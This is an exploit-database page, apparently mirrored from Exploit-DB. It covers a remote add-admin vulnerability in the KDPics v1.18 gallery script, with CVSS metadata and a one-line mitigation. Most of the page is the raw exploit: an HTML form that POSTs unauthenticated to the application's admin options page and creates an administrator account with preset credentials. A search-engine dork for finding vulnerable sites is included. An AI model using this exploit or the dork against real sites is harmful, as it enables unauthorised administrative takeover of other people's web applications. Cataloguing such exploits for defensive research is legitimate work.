header-logo
Suggest Exploit
vendor:
KDPics
by:
Snakespc
7,5
CVSS
HIGH
Remote Add Admin
264
CWE
Product Name: KDPics
Affected Version From: KDPics v1.18
Affected Version To: KDPics v1.18
Patch Exists: Yes
Related CWE: N/A
CPE: a:kdland:kdpics
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Généré par KDPics v1.18 Remote Add Admin

This exploit allows an attacker to add an admin user to the KDPics v1.18 application. The exploit is triggered by sending a POST request to the index.php3 page with the type parameter set to add. The username and password are set to Snakespc. This exploit was discovered by Snakespc in 2020.

Mitigation:

Ensure that the application is updated to the latest version and that all users have strong passwords.
Source

Exploit-DB raw data:

==============================================================================
[»] Généré par KDPics v1.18 Remote Add Admin
==============================================================================
   
[»] Script:   [Généré par KDPics v1.18] http://www.kdland.org/kdpics/
[»] Language: [ PHP ]
[»] Founder:  [ Snakespc Email:super_cristal@hotmail.com - Site:sec-war.com/cc> ]
[»] Greetz to:[ sec-warTeaM, PrEdAtOr ,alnjm33 >>> All My Mamber >> sec-war.com/cc ]
[»] Dork:      "Généré par KDPics v1.18"
###########################################################################
 ===[ Exploit ]===
   
<html>
<title>Généré par KDPics v1.18 Remote Add Admin</title>
 
<body link="#00FF00" text="#008000" bgcolor="#000000">
 
<form method="POST" action="http://www.site.com/kdpics/admin/index.php3?page=options&categorie=">
<input type="hidden" name="type" value="add">
<table border="1" cellpadding="4" style="border-collapse: collapse" width="100%" bordercolor="#808080">
<tr>
<td class="top">
<p align="center"><b>User & Pass :Snakespc</b></p>
<p align="center"><b><font face="Comic Sans MS">
<a href="http://server/path//index.php?act=idx" style="text-decoration: none">
<font color="#00FF00">[»]Founder:[ Snakespc Email:super_cristal@hotmail.com - Site:sec-war.com/cc> ]</p>
[»] Greetz to:[ sec-warTeaM, PrEdAtOr ,alnjm33 >>> All My Mamber >> sec-war.com/cc ]</p>[»] Dork:"Généré par KDPics v1.18"</font></a></font></b></p>
<p align="center"><b>Username:</b></td>
</tr>
<tr>
<td height="1">
<p align="center"><input type="text" name="adminuser" size="30" value="Snakespc"></td>
</tr>
<tr>
<td class="top">
<p align="center"><b>Password:</b></td>
</tr>
<tr>
 
<td height="22">
<p align="center">
<input type="password" name="adminpass" size="30" value="Snakespc"></td>
</tr>
<tr>
<td align="right">
<p align="center">
<input type="submit" value="Add User >>" style="font-weight: 700"></td>
</tr>
</form>
</table>
</html>
[»]Author: Snakespc <-
###########################################################################

Navigation

Suggest Exploit

Services By CQR